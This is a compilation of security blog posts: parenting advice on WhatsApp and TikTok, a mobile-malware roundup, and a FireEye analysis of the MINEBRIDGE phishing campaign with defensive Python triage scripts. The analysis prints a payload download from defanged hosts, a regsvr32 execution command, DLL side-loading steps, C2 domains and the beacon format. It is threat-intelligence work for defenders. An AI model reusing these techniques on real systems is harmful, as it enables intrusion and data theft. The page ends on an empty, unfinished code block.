Should your child be on WhatsApp? As long as your child is only connected to trusted people (and has some form of monitoring), this can be a relatively safe social app that echoes the features of most other apps. However, every family and every child is different, and whether or not your child is allowed to use the app is a personal decision. If your child is active on the app with your approval, one way to help them navigate the danger zones is to keep the safety conversation ongoing and honest. Your guidance is crucial. You’ve got this, parent!

The post Is WhatsApp Safe for Kids? Here’s What Parents Need to Know appeared first on McAfee Blogs.

Is Mobile Malware Playing Hide and Steal on Your Device?

Over the years, we’ve all grown accustomed to using our smartphones and mobile apps to support our lifestyles. We as consumers have developed expectations of how devices can enhance our everyday lives, from online banking transactions to handling work correspondence on the go. But as we become more reliant on our smart devices and apps, hackers use this dependency as an opportunity to gain unwarranted access to our personal data. According to McAfee’s latest Mobile Threat Report, hidden apps are the most active mobile threat facing consumers, generating nearly 50% of all malicious activities in 2019. Let’s dive into these mobile threats and how they could potentially impact your life.

Don’t Let These Mobile Threats Commandeer Your Device


LeifAccess (also known as Shopper) is an Android-based malware distributed through social media, gaming platforms, and fraudulent advertising. Once installed, this stealthy malware hides its icon and displays fake security notifications, hoping to trick the user into granting it accessibility access. LeifAccess/Shopper has also been found to use third-party logins to cheat app ranking systems and wreak more havoc on victims’ devices. The malware uses the accessibility features in Android to quietly create third-party accounts, automatically download apps from Google Play, and post reviews using names and emails configured on the victim’s device.

According to the Mobile Threat Report, hackers are also tricking users into installing adware onto their devices, redirecting them to a variety of fraudulent ads. Because digital ad revenue is simply based on screens displayed and clicks, hackers are quick to exploit this threat so they can collect fraudulent ad revenue at the expense of unsuspecting users. Due to the volume and speed of the redirects, many consumers don’t even realize that their device is infected or that their data is being collected.


HiddenAds masquerades as genuine apps like Call of Duty, Spotify, and FaceApp to trick users into downloading them. But once the app is installed on the victim’s device, the app icon changes to one that mimics the Settings icon. When the victim clicks on it, the app displays a fake error message that reads “Application is unavailable in your country. Click OK to uninstall.” However, clicking OK completes the malicious app installation process and then hides the fake Settings icon, making it nearly impossible to find and delete the malware.


McAfee researchers also discovered a new targeted attack hidden in a legitimate South Korean transit app. Called MalBus, this new attack method abuses the app developer’s compromised Google Play account. Once the hackers accessed the developer’s account, they added an additional library to the apps and uploaded them to Google Play. Now, MalBus spyware can phish for credentials with a local webpage that mimics the real Google login screen. Additionally, MalBus can drop a malicious trojan on the victim’s device that searches for specific military or political keywords. If these keywords are found, the victim’s matching files are uploaded to a remote server without their knowledge.

How to Stay Protected

As hackers continue to target consumers through the channels they spend the most time on – their mobile devices – it’s important for users to reflect on the current digital landscape to help protect their data, as well as their family and friends. Follow these security tips to defend against stealthy mobile threats:

  • Do your research. While some malicious apps do make it through the app store screening process, the majority of attack downloads appear to be coming from social media, fake ads, and other unofficial app sources. Before downloading an app to your device, do some quick research about the source and developer.
  • Read app reviews with a critical eye. Reviews and rankings are still a good method of determining whether an app is legitimate. However, watch out for reviews that reuse simple or repetitive phrases, as this could be a sign of a fraudulent review.
  • Update, update, update. Developers are actively working to identify and address security issues. Frequently update your operating systems and apps so that they have the latest fixes and security protections.
  • Use a VPN. A virtual private network, or VPN, allows you to send and receive data across a public network, but it encrypts your information so others on that network can’t read it. This can prevent hackers on the same Wi-Fi from spying on your internet activity, therefore protecting your privacy.
  • Keep tabs on your accounts. Use ID monitoring tools to be aware of changes or actions that you did not make. These may have been caused by malware and could indicate that your phone or account has been compromised.
  • Defend your devices with security software. Comprehensive security software across all devices continues to be a strong defensive measure to protect your data and privacy from online threats.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Mobile Malware Playing Hide and Steal on Your Device? appeared first on McAfee Blogs.

Is the TikTok App Safe for Kids?

TikTok safety

Everyone’s talking about the TikTok app. In addition to talking, tweens and teens are swiping, laughing, and sharing TikTok videos. Meanwhile, parents are concerned with one thing: Is TikTok safe?

What is TikTok?

Based out of China, TikTok is a video-based social networking app that replaced a predecessor app, which ended its digital run in 2017. The app allows users to create an account, make and post short 15-60-second videos, and view, comment on, and share videos from other users. According to reports, TikTok has 1 billion active users in 155 countries. Approximately 60 percent of TikTok’s audience is between 16 and 24. Guidelines state that anyone 12+ can use the app, though there’s no age-verification process.

Why Do Kids Love TikTok?

TikTok is the latest and greatest digital hangout and has become the main channel for kids to discover new and creative ways to express themselves. They can follow their interests, be entertained, and be rewarded with views, likes, and shares for their artistic efforts. TikTok has built-in editing tools, free music and dialogue clips, and filters that make creating videos easy for any skill level. Users can share funny sketches, lip-sync videos, and spontaneous, personal raves or rants. According to app reviews posted by teens, TikTok is also a go-to creative outlet, a place to de-stress, and a confidence-builder.

What are the risks?

Apps aren’t inherently risky. Rather, it’s the way individuals use an app that puts themselves or others at risk. That’s why understanding how your kids engage on TikTok, and how to make the experience as safe as possible, is important. Here are some of the risks your child could encounter on TikTok:

Contact from strangers. According to news reports, predators use TikTok to connect with kids. Anyone who follows a TikTok user can privately message them and initiate private conversations outside of the app.

Exposure to mature content and lyrics. Apps attract users of all ages, which means if your child has a TikTok account, he or she has access to the public video feed. With 1 billion users, your child will likely see videos containing sexually suggestive or explicit images and hear explicit lyrics (we saw and heard plenty). They may even unknowingly use music clips for their videos that contain explicit lyrics.

Spam and malware. Recent reports reveal software flaws that could potentially open up TikTok accounts to a range of malicious attacks. Researchers say hackers could have exploited the flaws to send legitimate-looking text messages loaded with malware, made private videos public, and accessed personal data.

Excessive screentime. TikTok is a curiosity magnet for kids, which can lead to excessive screen time, lack of sleep, and a host of other negative outcomes from too much time online.


Cyberbullying. TikTok users have been known to create “cringe compilations,” which are videos they deem to be odd, uncool, or cringe-worthy. Several of these cruel compilations have been posted outside of TikTok and have gone viral.

Quest for likes. As with any social network, some users can become preoccupied with amassing views, likes, and followers. This obsession can lead to bad decisions, risky behavior (such as challenges), cyberbullying, and sharing harmful content.

Oversharing. Some kids share their daily activities through TikTok videos and inadvertently expose personal information such as their school, their location, home address, and other personal data.

10 Family Safety Tips

Should you allow your child to use TikTok? The answer to that question depends on a few things, including the age of the child using the app and how they use it. Here are a few tips that may help in that decision.

  1. Download the app. The best way to understand TikTok is to download it, create an account, and explore. Take some solo time to search a few hashtags, scroll some feeds, and get a feel for the content. Visit the app’s safety center for an overview of safety tools. Visit the privacy center to see how your child’s data is being used.
  2. Go through the app together. Sit and browse content with your child. Discuss the pros and cons of the content and how it does or doesn’t align with your family’s digital ground rules.
  3. Max privacy settings. By making a TikTok account private, only approved followers (known friends) can view your child’s videos or send your child messages. When an account is public, anyone can comment, send messages, or share your child’s videos.
  4. Explore restricted mode. TikTok has a Restricted Mode for minors that will allow you to filter out inappropriate content.
  5. Explore Family Safety Mode. This TikTok feature allows a parent to link their TikTok account to their child’s to manage screen time, direct messages, set restrictions, and control friend and comment filters.
  6. Control interactions. Users can disable comments on a specific video, block people they don’t know from following them, and report abuse.
  7. Monitor social circles. Kids can change privacy settings and eventually be wooed into making more connections and getting more exposure. Consider monitoring who your child follows and who is following them. Consider the TikTok influencers they follow and the type of content they share.
  8. Monitor screen time. It’s easy to burn through countless hours on TikTok. The app has a digital wellbeing element that alerts users every two hours. Consider filtering software that adds another way to set screen limits.
  9. Talk about being an upstander. Creating and sharing original content online takes courage — and attracts bullies, making TikTok a potentially unsafe environment for kids. Encourage your child to be an upstander online and offer encouragement and support to peers when needed.
  10. Block the app. If you determine TikTok’s content isn’t a good fit for your family or that the risks outweigh the opportunities, both Android and iOS have built-in parental controls in Settings that allow you to block any app (consider rechecking these settings weekly).

One look at today’s headlines, and it’s tempting for a parent to want to delete every app like TikTok. Only we know a similar app will soon surface. Another approach is to jump into the digital mix. Know what apps your kids love and why. Understand how they use their favorite apps and who they are talking to. And, always remember: It’s never too early or too late to start these critical conversations with your kids. You’ve got this, parents!

The post Is the TikTok App Safe for Kids? appeared first on McAfee Blogs.

M-Trends 2020: Insights From the Front Lines

Today we release M-Trends 2020, the 11th edition of our popular annual FireEye Mandiant report. This latest M-Trends contains all of the statistics, trends, case studies and hardening recommendations that readers have come to expect through the years—and more.

One of the most exciting takeaways from this year’s report: the global median dwell time is now 56 days. That means that, in the median case, an attacker is going undetected on a network for under two months, an M-Trends first. This is a very promising statistic that demonstrates how far we’ve come since 2011, when the global median dwell time was 416 days. And yet, we know a sophisticated attacker needs only a few days to gain access to the crown jewels, so there is still plenty of room for improvement.

Another interesting statistic in the report is what we refer to as "detection by source." For the first time since 2015, the majority of organizations are being notified of compromises by external sources (53 percent) over internal teams (47 percent). This is more likely due to factors such as increases in law enforcement notifications and compliance changes, and less likely due to internal teams having lost a step.

There’s a whole lot more to look forward to in M-Trends 2020, including:

  • By the Numbers: Global median dwell time and detection by source are just the tip of the iceberg—we share a number of other statistics related to targeted industries, malware, threat techniques and more.
  • Newly Named APT Groups: Learn all about APT41, a group responsible for carrying out Chinese state-sponsored espionage and financially motivated activity since as far back as 2012.
  • Trends: We take a deep dive into the latest trends involving malware families, monetizing ransomware, crimeware as a service, and malicious insiders.
  • Case Studies: With so many organizations moving to the cloud, we take a look at a breach involving cloud assets. We also take readers through a campaign where attackers were targeting gift cards.

While M-Trends 2020 contains plenty of new information, the goal of M-Trends has remained the same since the beginning: to arm security professionals with details on the latest attacks and threats we are seeing during our engagements.

Download the 11th edition of M-Trends today.

Timeless Principles to Help Your Child Develop Social Superpowers

online relationships

“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming.  “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple, but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Every person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware of and willing to compliment the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

Carnegie wrote his book during the Great Depression, when the practice of optimism and simple truths was critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

STOMP 2 DIS: Brilliance in the (Visual) Basics

Throughout January 2020, FireEye has continued to observe multiple targeted phishing campaigns designed to download and deploy a backdoor we track as MINEBRIDGE. The campaigns primarily targeted financial services organizations in the United States, though targeting is likely more widespread than those we’ve initially observed in our FireEye product telemetry. At least one campaign targeted South Korean organizations, including a marketing agency.

In these campaigns, the phishing documents appeared to be carefully crafted and leveraged some publicly-documented — but in our experience uncommon and misunderstood — TTPs, likely in an effort to decrease detection of the malicious documents’ macros. The actor also used a self-hosted email marketing solution across multiple campaigns. Notably, the payload delivered in these campaigns leveraged a packer previously affiliated with a commonly-tracked threat actor, an overlap that we will explore later.

This blog post will review the theme of these campaigns and their targets, the adversary’s unique tradecraft, the MINEBRIDGE C++ backdoor, some potential attribution overlaps, and importantly — the threat actor’s love of rap music.

Targeting and Lure Detail

While we first identified MINEBRIDGE samples in December, we observed our first phishing campaigns relating to this activity in early January 2020. Email addresses used to send phishing messages were associated with domains that appear to have been registered specifically for this purpose within a few weeks of the activity — and were thematically consistent with the content of the phishing messages.

Additionally, the actor(s) responsible are likely using a self-hosted email marketing solution called Acelle. Acelle adds extended email headers to messages sent via the platform in the format of X-Acelle-<variable>. The messages observed across campaigns using these TTPs have included a “Customer-Id” value matching “X-Acelle-Customer-Id: 5df38b8fd5b58”. While that field remained consistent across all observed campaigns, individual campaigns also shared overlapping “X-Acelle-Sending-Server_Id” and “X-Acelle-Campaign-Id” values. All of the messages also included a “List-Unsubscribe” header offering a link hosted at suggesting that it is the server hosting the Acelle instance used across these campaigns. The sample table for one campaign below illustrates this data:








Time            Subject
1/7/20 16:15    tax return file
1/7/20 15:59    tax return file
(not preserved) tax return file
1/7/20 16:05    tax return file

(The sender, recipient and X-Acelle-* header columns of the original table were not preserved in this copy.)
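The header overlap described above is easy to turn into a triage script. The following is an added example, not code from the FireEye post: it parses raw messages with Python's email module, pulls the X-Acelle-Customer-Id, X-Acelle-Campaign-Id and X-Acelle-Sending-Server_Id values and the host of the List-Unsubscribe link, and clusters messages that share a customer/campaign pair. The four sample messages, their addresses, domains and id values are constructed for illustration.

```python
"""Cluster phishing e-mail by the Acelle tracking headers the post describes.

Added example, not code from the original FireEye post. The header names
(X-Acelle-Customer-Id, X-Acelle-Campaign-Id, X-Acelle-Sending-Server_Id,
List-Unsubscribe) are the ones named in the text; the messages, addresses,
domains and id values below are constructed for illustration only.
"""
from collections import defaultdict
from email import message_from_string
from urllib.parse import urlparse

ACELLE_HEADERS = (
    "X-Acelle-Customer-Id",
    "X-Acelle-Campaign-Id",
    "X-Acelle-Sending-Server_Id",
)


def fingerprint(raw: str) -> dict:
    """Extract Acelle header values, sender domain and List-Unsubscribe host from one message."""
    msg = message_from_string(raw)
    fp = {h.lower(): msg.get(h) for h in ACELLE_HEADERS}
    # List-Unsubscribe carries one or more <...> targets; keep the host of the first
    # http(s) one, since that host is what ties campaigns back to one Acelle instance.
    fp["unsubscribe_host"] = None
    for target in (msg.get("List-Unsubscribe") or "").split(","):
        target = target.strip().strip("<>")
        if target.startswith(("http://", "https://")):
            fp["unsubscribe_host"] = urlparse(target).hostname
            break
    fp["subject"] = msg.get("Subject")
    sender = msg.get("From") or ""
    fp["from_domain"] = sender.rsplit("@", 1)[-1].rstrip(">").strip() if "@" in sender else None
    return fp


def cluster(raw_messages) -> dict:
    """Group messages by (customer id, campaign id); messages with no Acelle headers go under None."""
    groups = defaultdict(list)
    for raw in raw_messages:
        fp = fingerprint(raw)
        key = (fp["x-acelle-customer-id"], fp["x-acelle-campaign-id"])
        groups[key if any(key) else None].append(fp)
    return dict(groups)


def _msg(*headers, body="See attachment."):
    """Build a raw RFC 822 message from constructed header lines."""
    return "\n".join(headers) + "\n\n" + body + "\n"


# Constructed sample messages: two from one campaign, one from a second campaign under
# the same Acelle customer id, and one ordinary message with no Acelle headers at all.
SAMPLE_MESSAGES = [
    _msg("From: Jane Doe <jane@cpa-example.test>", "To: cfo@bank-a.test",
         "Subject: Tax Return File", "X-Acelle-Customer-Id: 5df38b8fd5b58",
         "X-Acelle-Campaign-Id: 7", "X-Acelle-Sending-Server_Id: 3",
         "List-Unsubscribe: <https://mailer.example.test/unsubscribe/a1>"),
    _msg("From: Jane Doe <jane@cpa-example.test>", "To: ap@bank-b.test",
         "Subject: Tax Return File", "X-Acelle-Customer-Id: 5df38b8fd5b58",
         "X-Acelle-Campaign-Id: 7", "X-Acelle-Sending-Server_Id: 3",
         "List-Unsubscribe: <https://mailer.example.test/unsubscribe/a2>"),
    _msg("From: HR <recruit@staffing-example.test>", "To: hr@bank-a.test",
         "Subject: Candidate resume", "X-Acelle-Customer-Id: 5df38b8fd5b58",
         "X-Acelle-Campaign-Id: 9", "X-Acelle-Sending-Server_Id: 3",
         "List-Unsubscribe: <https://mailer.example.test/unsubscribe/b1>"),
    _msg("From: Bob <bob@colleague.test>", "To: cfo@bank-a.test", "Subject: Lunch?",
         body="Noon?"),
]


if __name__ == "__main__":
    for key, msgs in cluster(SAMPLE_MESSAGES).items():
        hosts = {m["unsubscribe_host"] for m in msgs}
        print(f"{key}: {len(msgs)} message(s), unsubscribe host(s) {hosts}")
```

Run against a mailbox export, the same customer id recurring under different sender domains and subjects is the signal the post describes: one operator, one mailer, several lures. The List-Unsubscribe host is a useful pivot because the operator has little reason to change it between campaigns.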





The URLs requested by the malicious documents and serving the final MINEBRIDGE payloads delivered in each of these campaigns provide additional overlap across campaigns. In all observed cases, the domains used the same bullet-proof hosting service. The URI used to download the final payload was “/team/invest.php” or, in one case, “/team/rumba.php”. Perhaps the most fun overlap, however, was discovered when trying to identify additional artifacts of interest hosted at similar locations. In most cases a GET request to the parent directory of “/team/” on each of the identified domains served up the lyrics to rap group Onyx’s “Bang 2 Dis” masterpiece. We will refrain from sharing the specific verse hosted due to explicit content.

One of the more notable characteristics of this activity was the consistency in themes used for domain registration, lure content, similarities in malicious document macro content, and targeting. Since first seeing these emails, we’ve identified at least 3 distinct campaigns.

Campaign #1: January 7, 2020 – Tax Theme
  • Emails associated with this campaign used the CPA themed domain registered in late November and the subject line “Tax Return File” with IRS related text in the message body.
  • The attached payload was crafted to look like an H&R Block related tax form.
  • Observed targeting included the financial sector exclusively.

Campaign #2: January 8, 2020 – Marketing Theme
  • Emails associated with this campaign used the same CPA themed domain along with, also registered late November.
  • The subject line and message body offered a marketing partnership opportunity to the victim.
  • The attached payload used a generic theme enticing users to enable macro content.
  • Observed targeting focused on a South Korean marketing agency.

Campaign #3: January 28, 2020 – Recruiting Theme
  • Emails associated with this campaign were sent from several different email addresses, though all used the recruiting-themed domain which was registered on January 20, 2020.
  • The subject line and message body referenced an employment candidate with experience in the financial sector.
  • The attached payload masqueraded as the resume of the same financial services candidate referenced in the phishing email.
  • Observed targeting included the financial sector exclusively.

Quit Stepping All Over My Macros

The phishing documents themselves leverage numerous interesting TTPs including hiding macros from the Office GUI, and VBA stomping.

VBA stomping is a colloquial term for manipulating an Office document so that the stored VBA source code of a macro no longer matches its compiled pseudo-code (hereafter "p-code"). Office keeps both forms in the document: the compressed source in the module stream, and the p-code that the VBA engine actually runs when the document is opened by the Office version that compiled it. In order to avoid duplicating research and wasting the reader’s time, we will instead reference the impressive work of our predecessors and peers in the industry. As an introduction to the concept, we first recommend reading the tool release blog post for EvilClippy from Outflank. The security team at Walmart has also published excellent research on the methodology. Vesselin Bontchev provides a useful open source utility, pcodedmp, for dumping the p-code from an Office document; it can be used to inspect the p-code of a document separately from its VBA source. It was adopted by the wider open source analysis toolkit oletools in order to detect stomping by comparing the identifiers and literals found in the p-code mnemonics with the keywords extracted from the VBA source.

That is a whole lot of quality reading for those interested. For the sake of brevity, the most important result of VBA stomping as relevant to this blog post is the following:

  • Static analysis tools focusing on VBA macro source extraction may be fooled into a benign assessment of a document bearing malicious p-code.
  • When VBA source is removed, and a document is opened in a version of Office for which the p-code was not compiled to execute, a macro will not execute correctly, resulting in potential failed dynamic analysis.
  • When a document is opened under a version of Office that uses a VBA version that does not match the version of Office used to create the document, VBA source code is recompiled back into p-code.
  • When a document is opened in Office and the GUI is used to view the macro, the embedded p-code is decompiled to be viewed.

The final two points identify some interesting complications in regard to leveraging this methodology more broadly. Versioning complexities arise, which toolkits like EvilClippy address with Office version enumeration features. An actor’s VBA stomped document containing benign VBA source but evil p-code must be built for the victim’s exact version of Office, or the sample will not detonate properly. Additionally, if an actor sends a stomped document and a user or researcher opens the macro in the Office editor, they will see the malicious code.

Our actor addressed the latter point of this complication by leveraging what we assess to be another feature of the EvilClippy utility, wherein viewing the macro source is made inaccessible to a user within Office by modifying the PROJECT stream of the document. Let’s highlight this below using a publicly available sample we attribute to our actors (SHA256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e):

Document PROJECT stream:

[Host Extender Info]
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

The above PROJECT stream has been modified. Within the [Workspace] section of the PROJECT stream, a module named Module1 is referenced. However, there is no Module=Module1 record defining it, so the Office editor has no module to display. We would expect the unmodified PROJECT stream of this document, prior to utilization of a tool to modify it, to contain that definition:

Module=Module1
[Host Extender Info]
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

It is interesting to note that we initially identified this actor only performing this PROJECT stream manipulation on their malicious documents, avoiding any versioning complexities, without actually stomping the p-code to mismatch the VBA source. This seems like an odd decision and is possibly indicative of an actor assessing what “works” for their campaigns. The above malicious document is an example of them leveraging both methodologies, as highlighted by this screenshot from the awesome publicly available web service IRIS-H Digital Forensics:

We can see that the document's VBA source is a blank Sub procedure definition. A quick glance at the p-code identifies both network-based indicators and host-based indicators we can use to determine what this sample would do when executed on the proper Office version. When we attempt to open the macro in the GUI editor, Office gets angry:

For analysts looking to identify this methodology holistically, we recommend the following considerations:

  • The GUI hiding functionality results in an altered PROJECT stream wherein a module is referenced in the workspace, but no module, class, or baseclass is defined in the stream. This is a potential static detection.
  • While the macro source is no longer present, there are still static strings present in Module1 in this sample which may indicate Windows APIs leveraged. This is a potential static detection.
  • Utilities like the previously mentioned oletools can do all of this detection for you. If you identify false negatives, false positives, or bugs, the open source project maintainers respond to them regularly like the superheroes that they are.
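
The first static detection above, a workspace entry with no matching module definition, is simple enough to implement directly. The following is an added example written for this page; it is not FireEye's tooling and not part of oletools. It works on the text of a PROJECT stream that has already been extracted from the document (with olefile, for instance), and the two sample streams are constructed for demonstration rather than recovered from the sample discussed above.

```python
"""Static check for VBA PROJECT-stream tampering of the kind described above.

A normal PROJECT stream defines every module in its leading property block
(Module=, Class=, BaseClass= or Document= lines) and then lists window
geometry for the same modules under [Workspace].  A stream whose workspace
references a module that is never defined is the signature of the GUI-hiding
manipulation, so that mismatch is what this check reports.
"""
import re

# Workspace geometry entries look like "Module1=26, 26, 388, 131, Z".
WORKSPACE_ENTRY = re.compile(r"^\s*([A-Za-z_]\w*)=\d+, \d+, \d+, \d+, [A-Z]\s*$")
# Module definitions from the property block, e.g. "Module=Module1" or
# "Document=ThisDocument/&H00000000" (the part after "/" is a flag word).
DEFINITION = re.compile(r"^\s*(?:Module|Class|BaseClass|Document)=([^/\r\n]+)",
                        re.IGNORECASE)


def defined_modules(project_stream: str) -> set:
    """Names of modules/classes/documents the stream actually defines."""
    names = set()
    for line in project_stream.splitlines():
        m = DEFINITION.match(line)
        if m:
            names.add(m.group(1).strip())
    return names


def workspace_modules(project_stream: str) -> list:
    """Names referenced by workspace geometry entries, in file order."""
    names = []
    for line in project_stream.splitlines():
        m = WORKSPACE_ENTRY.match(line)
        if m:
            names.append(m.group(1))
    return names


def undefined_workspace_modules(project_stream: str) -> list:
    """Workspace entries that have no matching definition; a non-empty result
    means the stream has been tampered with (or is otherwise malformed)."""
    defined = defined_modules(project_stream)
    return [name for name in workspace_modules(project_stream) if name not in defined]


def is_project_stream_suspicious(project_stream: str) -> bool:
    return bool(undefined_workspace_modules(project_stream))


# Constructed sample streams for demonstration (not extracted from the sample
# discussed in the post).  The tampered one mirrors the shape shown above:
# workspace entries with no Module=/Document= definitions at all.
TAMPERED_PROJECT = """\
[Host Extender Info]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z
"""

NORMAL_PROJECT = """\
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
Module=Module1
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"

[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z
"""

if __name__ == "__main__":
    for label, stream in (("tampered", TAMPERED_PROJECT), ("normal", NORMAL_PROJECT)):
        missing = undefined_workspace_modules(stream)
        print(f"{label}: suspicious={bool(missing)} undefined={missing}")
```

The check deliberately ignores which section a geometry entry sits in, because, as the stream above shows, the manipulated stream may not even keep a [Workspace] header. A stream that defines modules the workspace never mentions is left alone: that is normal for modules whose editor window was never opened.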

The above methodology creates questions regarding potential efficiency problems for scaling any sizable campaign using it. While tools like EvilClippy provide the means to create difficult-to-detect malicious documents that can potentially sneak past some dynamic and static detections, their payloads have the additional burden of needing to fingerprint targets to enable successful execution. While actors with sufficient resources and creativity can no doubt account for these requirements, it is relevant to note that detections for these methodologies will likely yield more targeted activity. In fact, tertiary review of samples employing these techniques identified unrelated activity delivering both Cobalt Strike BEACON and POSHC2 payloads.

We recently expanded our internal FireEye threat behavior tree to accommodate these techniques. At the time of publication, the authors were unable to directly map the methods – PROJECT stream manipulation and VBA stomping – to existing techniques in the MITRE ATT&CK Matrix™ for Enterprise. However, our team submitted these as contributions to the ATT&CK knowledge base prior to publication and will make additional data available for ATT&CK Sightings.

Crossing The Bridge of Khazad-dûm: The MINEBRIDGE Infection Chain

Successful detonation of the previously detailed malicious document results in creation of “uCWOncHvBb.dll” via a call to URLDownloadToFileA to the URL hxxps://marendoger[.]com/team/rumba.php. The returned MINEDOOR-packed MINEBRIDGE sample is saved in the executing user's AppData directory (e.g., C:\Users\username\AppData\Roaming\uCWOncHvBb.dll), and then subsequent execution of the DllRegisterServer export via invocation of “regsvr32.exe /s %AppData%\uCWOncHvBb.dll” occurs:

This will result in a ZIP file being retrieved from the URL hxxps://creatorz123[.]top/~files_tv/~all_files_m.bin using the Windows API URLDownloadToFileW. The ZIP file is written to %TEMP%, unzipped to the newly created directory %AppData%\Windows Media Player, and then deleted:

The ZIP file contains legitimate files required to execute a copy of TeamViewer, listed in the file creation area of the IOC section of this post. When a file named TeamViewer.exe is identified while unzipping, it is renamed to wpvnetwks.exe:

After completing these tasks, uCWOncHvBb.dll moves itself to %AppData%\Windows Media Player\msi.dll. The phishing macro then closes the handle to msi.dll, and calls CreateProcessA on wpvnetwks.exe, which results in the renamed TeamViewer instance side-loading the malicious msi.dll located alongside it. The malware ensures its persistence through reboot by creating a link file at %CSIDL_STARTUP%\Windows WMI.lnk, which points to %AppData%\Windows Media Player\wpvnetwks.exe, resulting in its launch at user logon.

The end result is a legitimate, though outdated (version 11, compiled on September 17, 2018, at 10:30:12 UTC), TeamViewer instance hijacked by a malicious sideloaded DLL (MINEBRIDGE).

MINEBRIDGE is a 32-bit C++ backdoor designed to be loaded by an older, unpatched instance of the legitimate remote desktop software TeamViewer by DLL load-order hijacking. The backdoor hooks Windows APIs to prevent the victim from seeing the TeamViewer application. By default, MINEBRIDGE conducts command and control (C2) communication via HTTPS POST requests to hard-coded C2 domains. The POST requests contain a GUID derived from the system’s volume serial number, a TeamViewer unique id and password, username, computer name, operating system version, and beacon interval. MINEBRIDGE can also communicate with a C2 server by sending TeamViewer chat messages using a custom window procedure hook. Collectively, the two C2 methods support commands for downloading and executing payloads, downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, executing arbitrary shell commands, process elevation, turning on/off TeamViewer's microphone, and gathering system UAC information.

MINEBRIDGE’s default method of communication is sending HTTPS POST requests over TCP port 443. This method of communication is always active; however, the beacon-interval time may be changed via a command. Before sending any C2 beacons, the sample waits to collect the TeamViewer-generated unique id (<tv_id>) and password (<tv_pass>) via SetWindowTextW hooks.

This specific sample continuously sends an HTTP POST request over TCP port 443 with the URI ~f83g7bfiunwjsd1/g4t3_indata.php to each host listed below until a response is received.

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

The POST body contains the formatted string uuid=<guid>&id=<tv_id>&pass=<tv_pass>&username=<user_name>&pcname=<comp_name>&osver=<os_version>&timeout=<beacon_interval> where <guid> is a GUID derived from the system's volume serial number and formatted using the format string %06lX-%04lX-%04lX-%06lX. Additionally, the request uses the hard-coded HTTP User-Agent string "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"
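
The beacon profile above (fixed URI, fixed User-Agent, fixed POST-body field order and a GUID with a known printf shape) is specific enough to match on. The following is an added example written for this page, not FireEye's code, that classifies a captured HTTP request against that profile. It assumes the URI is rooted at "/" and that the request body is available (a TLS-inspecting proxy or sandbox capture); the sample request is constructed with placeholder values and is not a real capture.

```python
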